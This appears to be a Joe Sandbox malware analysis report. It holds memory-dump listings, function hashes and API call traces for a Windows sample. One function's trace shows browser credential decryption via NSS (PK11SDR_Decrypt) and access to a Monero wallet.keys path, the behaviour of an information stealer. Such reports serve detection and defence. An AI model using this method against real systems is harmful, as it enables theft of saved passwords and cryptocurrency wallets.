Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: l]}
API String ID: 0-1261641130
Opcode ID: 718ba9188b6143c4051864c9d562c64b706818c0c2a83b9cac5ec3f67ef52271
Instruction ID: a8f0fcad0a758e4621751261caaab80a06dbcd30cb0647e8a61e4231b594d36b
Opcode Fuzzy Hash: 718ba9188b6143c4051864c9d562c64b706818c0c2a83b9cac5ec3f67ef52271
Instruction Fuzzy Hash: 527105F39082049FE314BE39DC4536ABBE6EBD4720F1A853CDBC4C3784EA7959058686

Function 007A82EC Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

Pr., xrefs: 007A8449

Memory Dump Source

Source File: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Pr.
API String ID: 0-4093456258
Opcode ID: abd83f0b03455ea46b501fb20b8e3a1a9f57dd6f2be4fd560248c22ef39ba43a
Instruction ID: 1003545bd07f4107c6f6f0847ebc8d6111854ecf29d1a9472f44a09f03e46d2b
Opcode Fuzzy Hash: abd83f0b03455ea46b501fb20b8e3a1a9f57dd6f2be4fd560248c22ef39ba43a
Instruction Fuzzy Hash: A7413BF390C7189FD3106F29DCC57AAFBE9EB94760F074A2CE9D183744EA3518408696

Function 00690E9A Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0538f2c79d00062eece9f8760aea0ac3281f22d82d9b66bbe4157cf19a21a4f7
Instruction ID: 245a40e684db386d3dc0570237ad406906dba948b793e0a023bd04ff755e7ae0
Opcode Fuzzy Hash: 0538f2c79d00062eece9f8760aea0ac3281f22d82d9b66bbe4157cf19a21a4f7
Instruction Fuzzy Hash: 6D7104F3E186109BF3046E2CEC8536ABAD5EB94320F1B453DDAC997780E5799C0487C6

Function 00701AD2 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ccca80295d62658c69620fbec9f96dcd77a928755362e2c991edcf5991abba
Instruction ID: f45979f29b7f8de895611bc03e609a3fbc6d3ddeb91168bc8606e7a5694f6a53
Opcode Fuzzy Hash: 47ccca80295d62658c69620fbec9f96dcd77a928755362e2c991edcf5991abba
Instruction Fuzzy Hash: F1712AF7A083049BD3006E2EDD8872AFBD5EFD4720F1A493DEAC8C7344E57989458656

Function 0066CAC9 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bff8653e7e10071f1357992b49516069446423fd1d4fb90e3e5592c4479e52c2
Instruction ID: 3661b1a4f80dd7cf6278dce51f5af513b41c5de212a9f06005fd10e2413e3536
Opcode Fuzzy Hash: bff8653e7e10071f1357992b49516069446423fd1d4fb90e3e5592c4479e52c2
Instruction Fuzzy Hash: 7A5124B3A193145FE3006E2EDC8876AF7E9EF94320F1B853DDAC897744E97958408786

Function 00650B7E Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8ba3bb28b1f72840b8f1bb1d95c030525df5cd74766ece2b2db6431f67c02e9
Instruction ID: 51f98fe4eb6f0fc80c9809aa5f67c7524c63337ab9a1a45ebc4431cb14887214
Opcode Fuzzy Hash: a8ba3bb28b1f72840b8f1bb1d95c030525df5cd74766ece2b2db6431f67c02e9
Instruction Fuzzy Hash: 8A41F2B3E041104BE3146E2CDC4576AB7DA9F94320F2F063EDE98E7B80E9B99D1586C5

Function 00379750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 0036C990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0036C9A5

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0114D410,00000000,?,0038144C,00000000,?,?), ref: 0036CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0036CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0036CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0036CAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0036CAD9
StrStrA.SHLWAPI(?,0114D4B8,00380B52), ref: 0036CAF7
StrStrA.SHLWAPI(00000000,0114D4D0), ref: 0036CB1E
StrStrA.SHLWAPI(?,0114D800,00000000,?,00381458,00000000,?,00000000,00000000,?,01148F38,00000000,?,00381454,00000000,?), ref: 0036CCA2
StrStrA.SHLWAPI(00000000,0114D980), ref: 0036CCB9

Part of subcall function 0036C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0036C871
Part of subcall function 0036C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0036C87C
Part of subcall function 0036C820: PK11_GetInternalKeySlot.NSS3 ref: 0036C88A
Part of subcall function 0036C820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0036C8A5
Part of subcall function 0036C820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0036C8EB
Part of subcall function 0036C820: PK11_FreeSlot.NSS3(?), ref: 0036C961

StrStrA.SHLWAPI(?,0114D980,00000000,?,0038145C,00000000,?,00000000,01148F88), ref: 0036CD5A
StrStrA.SHLWAPI(00000000,01149298), ref: 0036CD71

Part of subcall function 0036C820: lstrcat.KERNEL32(?,00380B46), ref: 0036C943
Part of subcall function 0036C820: lstrcat.KERNEL32(?,00380B47), ref: 0036C957
Part of subcall function 0036C820: lstrcat.KERNEL32(?,00380B4E), ref: 0036C978

lstrlen.KERNEL32(00000000), ref: 0036CE44
CloseHandle.KERNEL32(00000000), ref: 0036CE9C
NSS_Shutdown.NSS3 ref: 0036CEAA

Strings

, xrefs: 0036C9C6

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: 7273be62163c3ff042ab709272afbb3d6dce48d26a9ddee19ada88b7a4d94420
Instruction ID: 4b9605002883fd00ca130d34f3ef24ec7aef9bb21280cdd0ab2d68251be90136
Opcode Fuzzy Hash: 7273be62163c3ff042ab709272afbb3d6dce48d26a9ddee19ada88b7a4d94420
